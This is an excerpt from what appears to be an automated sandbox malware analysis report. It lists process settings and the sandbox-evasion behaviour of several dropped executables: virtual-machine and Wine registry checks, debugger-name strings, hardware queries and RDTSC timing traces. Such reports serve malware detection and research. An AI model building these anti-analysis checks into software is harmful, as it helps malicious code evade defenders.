                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_7-9727
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSystem information queried: FirmwareTableInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSystem information queried: FirmwareTableInformation
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                            Source: regsvr32.exe, 00000024.00000002.2747028039.000000000132B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                            Source: regsvr32.exe, 00000024.00000002.2747028039.000000000132B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXEZ
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: EFF024 second address: EFF02E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: EFF02E second address: EFE89F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FF30CF3CAF9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D2191h], ecx 0x00000016 cmc 0x00000017 push dword ptr [ebp+122D1589h] 0x0000001d add dword ptr [ebp+122D1AEAh], edi 0x00000023 call dword ptr [ebp+122D1A53h] 0x00000029 pushad 0x0000002a jbe 00007FF30CF3CAE7h 0x00000030 jmp 00007FF30CF3CAF9h 0x00000035 xor eax, eax 0x00000037 mov dword ptr [ebp+122D35B4h], ecx 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 cld 0x00000042 mov dword ptr [ebp+122D291Bh], eax 0x00000048 clc 0x00000049 mov esi, 0000003Ch 0x0000004e pushad 0x0000004f pushad 0x00000050 or ch, 00000061h 0x00000053 mov dl, 3Ch 0x00000055 popad 0x00000056 mov al, cl 0x00000058 popad 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d sub dword ptr [ebp+122D1B63h], edi 0x00000063 lodsw 0x00000065 jo 00007FF30CF3CAF2h 0x0000006b jns 00007FF30CF3CAECh 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 jng 00007FF30CF3CAF5h 0x0000007b jmp 00007FF30CF3CAEFh 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007FF30CF3CAEAh 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c push eax 0x0000008d push edx 0x0000008e push eax 0x0000008f pop eax 0x00000090 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: EFE89F second address: EFE8B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: EFE8B1 second address: EFE8D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAF6h 0x00000008 jmp 00007FF30CF3CAF0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: EFE8D1 second address: EFE8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1075365 second address: 107536B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107536B second address: 107536F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107536F second address: 1075375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1075375 second address: 1075389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FF30D194DBAh 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1075389 second address: 107539C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF30CF3CAEDh 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107539C second address: 10753A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 105A3A1 second address: 105A3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF30CF3CAE6h 0x0000000a jbe 00007FF30CF3CAE6h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10745BF second address: 10745C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10748BF second address: 10748D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF30CF3CAE6h 0x0000000a jmp 00007FF30CF3CAEBh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107728E second address: 10772C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+122D2C1Fh] 0x00000011 pop ecx 0x00000012 push 00000000h 0x00000014 mov cx, BDACh 0x00000018 push 673CDA36h 0x0000001d push eax 0x0000001e push edx 0x0000001f js 00007FF30D194DC7h 0x00000025 jmp 00007FF30D194DC1h 0x0000002a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10772C4 second address: 107733C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 673CDAB6h 0x00000010 or esi, 24E36553h 0x00000016 mov ecx, dword ptr [ebp+122D2A27h] 0x0000001c push 00000003h 0x0000001e call 00007FF30CF3CAF8h 0x00000023 jmp 00007FF30CF3CAF1h 0x00000028 pop edx 0x00000029 push 00000000h 0x0000002b mov si, F0F5h 0x0000002f push 00000003h 0x00000031 movsx edx, si 0x00000034 call 00007FF30CF3CAE9h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d js 00007FF30CF3CAE6h 0x00000043 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 107733C second address: 1077346 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1077346 second address: 107734B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1077495 second address: 1077499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1077499 second address: 10774BA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF30CF3CAF5h 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10774BA second address: 107754A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D3758h], ebx 0x00000012 push 00000000h 0x00000014 jng 00007FF30D194DC6h 0x0000001a call 00007FF30D194DB9h 0x0000001f push eax 0x00000020 jmp 00007FF30D194DC5h 0x00000025 pop eax 0x00000026 push eax 0x00000027 jnc 00007FF30D194DC3h 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 jmp 00007FF30D194DBDh 0x00000036 mov eax, dword ptr [eax] 0x00000038 jng 00007FF30D194DC7h 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 pushad 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
